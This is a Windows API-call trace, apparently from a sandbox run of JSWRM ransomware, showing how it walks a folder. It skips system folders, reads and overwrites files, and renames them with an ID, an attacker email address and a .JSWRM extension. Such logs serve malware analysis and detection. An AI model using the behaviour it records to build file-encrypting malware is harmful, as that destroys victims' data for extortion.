1 [0126.777] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0126.777] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0126.777] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x423915a2, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x423915a2, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x423915a2, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0126.777] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0126.777] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0126.777] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0126.777] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0126.777] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0126.777] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0126.777] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0126.777] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0126.778] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0126.778] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0126.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0126.778] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0126.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0126.778] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240ef8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0126.778] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0126.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0126.778] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0126.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0126.778] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240fe8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0126.778] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0126.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22e358 [0126.778] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0126.778] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0126.778] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0126.778] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x167cf4d5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x167cf4d5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167f56e9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x110c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="LocalizedStrings.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0126.778] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2=".") returned 1 [0126.778] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="..") returned 1 [0126.778] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="...") returned 1 [0126.778] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="windows") returned -1 [0126.778] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="recovery") returned -1 [0126.778] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="perflogs") returned -1 [0126.778] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="documents and settings") returned 1 [0126.778] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="$RECYCLE.BIN") returned 1 [0126.778] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="system volume information") returned -1 [0126.778] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="msocache") returned -1 [0126.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0126.778] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedStrings.xml", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0126.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0126.778] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedStrings.xml", cchWideChar=20, lpMultiByteStr=0x2413d0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocalizedStrings.xml", lpUsedDefaultChar=0x0) returned 20 [0126.778] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0126.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0126.778] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedStrings.xml", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0126.779] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0126.779] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedStrings.xml", cchWideChar=20, lpMultiByteStr=0x240fe8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocalizedStrings.xml", lpUsedDefaultChar=0x0) returned 20 [0126.779] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0126.779] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22df20 [0126.779] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22e358 | out: hHeap=0x1e0000) returned 1 [0126.779] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0126.779] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0126.779] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22eca0 [0126.779] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\no\\LocalizedStrings.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\no\\localizedstrings.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0126.781] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=4364) returned 1 [0126.781] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.781] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1100) returned 0x279338 [0126.781] ReadFile (in: hFile=0x338, lpBuffer=0x279338, nNumberOfBytesToRead=0x1100, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x279338*, lpNumberOfBytesRead=0x345e1cc*=0x1100, lpOverlapped=0x0) returned 1 [0126.783] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.783] WriteFile (in: hFile=0x338, lpBuffer=0x279338*, nNumberOfBytesToWrite=0x1100, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x279338*, lpNumberOfBytesWritten=0x345e1c8*=0x1100, lpOverlapped=0x0) returned 1 [0126.783] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x279338 | out: hHeap=0x1e0000) returned 1 [0126.783] CloseHandle (hObject=0x338) returned 1 [0126.783] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0126.783] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0126.783] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0126.783] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0126.783] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0126.783] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0126.783] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0126.783] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0126.783] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0126.783] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0126.783] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b568 [0126.783] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0126.783] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b568 | out: hHeap=0x1e0000) returned 1 [0126.783] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0126.783] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\no\\LocalizedStrings.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\no\\localizedstrings.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\no\\LocalizedStrings.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\no\\localizedstrings.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0126.784] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0126.784] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0126.784] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22eca0 | out: hHeap=0x1e0000) returned 1 [0126.784] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0126.784] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0126.784] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x381f2dc, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x381f2dc, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x381f2dc, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xca90, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.AnalysisServices.Common.resources.dll", cAlternateFileName="MIE3DA~1.DLL")) returned 1 [0126.784] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2=".") returned 1 [0126.785] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="..") returned 1 [0126.785] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="...") returned 1 [0126.785] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="windows") returned -1 [0126.785] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="recovery") returned -1 [0126.785] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="perflogs") returned -1 [0126.785] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="documents and settings") returned 1 [0126.785] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.785] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="system volume information") returned -1 [0126.785] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="msocache") returned -1 [0126.785] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ae0 [0126.785] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.resources.dll", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0126.785] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0126.785] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.resources.dll", cchWideChar=47, lpMultiByteStr=0x22d0d8, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Common.resources.dll", lpUsedDefaultChar=0x0) returned 47 [0126.785] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ae0 | out: hHeap=0x1e0000) returned 1 [0126.785] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233160 [0126.785] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.resources.dll", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0126.785] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0126.785] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.resources.dll", cchWideChar=47, lpMultiByteStr=0x22d260, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Common.resources.dll", lpUsedDefaultChar=0x0) returned 47 [0126.785] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233160 | out: hHeap=0x1e0000) returned 1 [0126.785] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23e340 [0126.785] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22df20 | out: hHeap=0x1e0000) returned 1 [0126.785] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0126.785] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0126.785] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x51c07e2, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x51c07e2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x51c07e2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x38ad8, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.AnalysisServices.Common.Wizard.resources.dll", cAlternateFileName="MIDF86~1.DLL")) returned 1 [0126.785] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2=".") returned 1 [0126.785] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="..") returned 1 [0126.785] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="...") returned 1 [0126.785] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="windows") returned -1 [0126.785] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="recovery") returned -1 [0126.785] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="perflogs") returned -1 [0126.785] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="documents and settings") returned 1 [0126.785] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.785] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="system volume information") returned -1 [0126.785] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="msocache") returned -1 [0126.785] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209260 [0126.786] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0126.786] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0126.786] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", cchWideChar=54, lpMultiByteStr=0x20dde8, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpUsedDefaultChar=0x0) returned 54 [0126.786] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209260 | out: hHeap=0x1e0000) returned 1 [0126.786] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0126.786] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0126.786] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0126.786] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", cchWideChar=54, lpMultiByteStr=0x20d578, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpUsedDefaultChar=0x0) returned 54 [0126.786] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0126.786] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23ef08 [0126.786] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e340 | out: hHeap=0x1e0000) returned 1 [0126.786] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0126.786] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0126.786] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6dea551, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6dea551, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6dea551, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x14030, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", cAlternateFileName="MI038C~1.DLL")) returned 1 [0126.786] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2=".") returned 1 [0126.786] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="..") returned 1 [0126.786] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="...") returned 1 [0126.786] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="windows") returned -1 [0126.786] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="recovery") returned -1 [0126.786] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="perflogs") returned -1 [0126.786] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="documents and settings") returned 1 [0126.786] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.786] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="system volume information") returned -1 [0126.786] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="msocache") returned -1 [0126.786] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209260 [0126.786] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0126.786] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0126.786] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", cchWideChar=54, lpMultiByteStr=0x20d578, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpUsedDefaultChar=0x0) returned 54 [0126.786] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209260 | out: hHeap=0x1e0000) returned 1 [0126.786] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0126.786] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0126.786] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0126.786] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", cchWideChar=54, lpMultiByteStr=0x20d728, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpUsedDefaultChar=0x0) returned 54 [0126.786] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0126.787] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f970 [0126.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ef08 | out: hHeap=0x1e0000) returned 1 [0126.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0126.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0126.787] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xffddb96c, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xffddb96c, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xffddb96c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1fe030, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", cAlternateFileName="MIF61E~1.DLL")) returned 1 [0126.787] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2=".") returned 1 [0126.787] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="..") returned 1 [0126.787] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="...") returned 1 [0126.787] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="windows") returned -1 [0126.787] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="recovery") returned -1 [0126.787] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="perflogs") returned -1 [0126.787] lstrcmpiW 